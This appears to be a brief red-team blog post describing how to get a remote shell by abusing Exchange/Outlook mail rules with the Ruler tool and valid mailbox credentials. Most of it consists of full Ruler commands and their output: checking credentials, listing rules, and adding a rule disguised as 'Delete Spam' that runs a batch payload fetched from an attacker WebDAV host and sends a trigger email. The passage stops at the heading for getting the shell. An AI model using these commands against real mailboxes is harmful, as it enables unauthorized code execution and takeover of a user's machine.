Mail rules/forms to get a shell
2 min readJan 3, 2022
If you were in a redteaming assessments, and you somehow have a valid credentials to a user mailbox you can get a remote shell using the below attack scenario.
ps. This will work on Outlook Web Access (OWA)
Like most good attacks, we aren’t really exploiting flaws, just abusing functionality to get reliable code execution.
You need three pieces of information:
- Payload in a bat/exe file
- Hosted on a webdav server
- and credentials!
We will use a cool tool called Ruler. A tool to abuse Exchange services
Checking Access
Check if the credentials are valid and if we can access the mail box remotely:
0xy37@kali:~/Tools/ruler# ./ruler-linux64 -insecure -username john -email john@email.com -password P@ssw0rd321 check[+] Retrieving MAPI/HTTP info
[+] Looks like we are good to go!
Displaying Existing Rules
Check if the target user account have any existing rule:
0xy37@kali:~/Tools/ruler# ./ruler-linux64 -insecure -username john -email john@email.com -password P@ssw0rd321 display[+] Found cached Autodiscover record. Using this (use — nocache to force new lookup)
[+] Retrieving Rules
[+] No Rules Found
Add a New Rule
Now we add a new rule, this is the malicious rule that should get us a remote shell.
0xy37@kali:~/Tools/ruler# ./ruler-linux64 -insecure -username john -email john@email.com -password P@ssw0rd321 add -location “\\\\10.10.10.10@81\\webdav\\stage.bat” -send[+] Found cached Autodiscover record. Using this (use — nocache to force new lookup)
[+] Adding Rule
[+] Rule Added. Fetching list of rules…
[+] Found 1 rules
[+] Rule Name | Rule ID
[+] — — — — — — — — — — -| — — — — — — — — —
[+] Delete Spam | 0100000307e1be2e
[+]
[+] Auto Send enabled, wait 30 seconds before sending email (synchronisation)
[+] Sending email
[+] Message sent, your shell should trigger shortly.
Getting the shell:
